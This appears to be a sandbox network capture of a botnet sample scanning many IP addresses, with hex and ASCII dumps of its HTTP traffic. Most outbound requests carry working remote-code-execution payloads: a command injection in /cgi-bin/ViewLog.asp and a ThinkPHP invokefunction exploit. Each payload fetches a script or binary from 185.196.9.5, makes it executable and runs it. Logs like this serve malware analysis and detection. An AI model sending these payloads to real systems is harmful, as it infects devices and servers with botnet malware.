Feb 25, 2024 19:05:06.884943962 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:09.092986107 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.701050043 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:22.660944939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:41.860522985 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1059	192.168.2.15	42738	94.120.168.50	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:05.254616976 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1060	192.168.2.15	52806	94.120.159.151	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:05.260276079 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1061	192.168.2.15	60674	88.221.77.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:05.260848045 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:05.524142027 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:05 GMT Date: Sun, 25 Feb 2024 18:05:05 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 33 30 35 26 23 34 36 3b 31 39 61 65 34 34 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.95e6655f.1708884305.19ae442</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1062	192.168.2.15	54370	94.110.103.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:05.323010921 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:05.539603949 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Sun, 25 Feb 2024 18:05:05 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1063	192.168.2.15	60222	88.31.47.64	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:06.769862890 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1064	192.168.2.15	37810	88.115.205.71	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:06.920169115 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1065	192.168.2.15	39300	88.176.44.14	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:06.947168112 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1066	192.168.2.15	38660	88.198.112.80	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:06.954037905 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:07.138185978 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:05:07 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1067	192.168.2.15	57982	88.7.144.49	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:06.962500095 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:07.155556917 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:05:07 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1068	192.168.2.15	48566	94.121.178.57	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:07.810661077 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1069	192.168.2.15	34110	62.106.95.142	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:07.851959944 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1070	192.168.2.15	36640	85.105.253.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:08.096537113 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:08.333589077 CET	165	IN	HTTP/1.1 307 Temporary Redirect Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://185.196.9.5:80/cgi-bin/ViewLog.asp Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1071	192.168.2.15	51420	88.28.202.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:08.607111931 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:09.924990892 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:10.954613924 CET	150	IN	HTTP/1.0 404 Not Found Server: RapidLogic/1.1 MIME-version: 1.0 Content-type: text/html Data Raw: 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: <HEAD><TITLE>404 Not Found</TITLE></HEAD>404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
1072	192.168.2.15	43840	112.213.90.177	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:09.990608931 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:10.344424963 CET	303	IN	HTTP/1.0 404 Not Found X-Frame-Options: sameorigin X-XSS-Protection: 1 Server: WDaemon/4.0 Date: Sun, 25 Feb 2024 18:05:09 GMT Content-Type: text/html Content-Length: 93 Connection: close Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1073	192.168.2.15	49962	95.141.128.178	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:10.871786118 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:11.118474960 CET	242	IN	HTTP/1.0 400 Bad Request Connection: close Content-Length: 113 Date: Sun, 25 Feb 2024 18:05:09 GMT Expires: 0 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1074	192.168.2.15	52888	95.101.179.9	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:10.879798889 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:11.196851969 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:11.450251102 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:05:11 GMT Date: Sun, 25 Feb 2024 18:05:11 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 63 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 38 38 38 34 33 31 31 26 23 34 36 3b 31 38 62 32 34 37 32 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.8c7a7b5c.1708884311.18b24722</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1075	192.168.2.15	59488	95.56.92.157	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:10.897507906 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:11.165406942 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:05:11.166361094 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
1076	192.168.2.15	55940	95.179.156.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:11.291518927 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
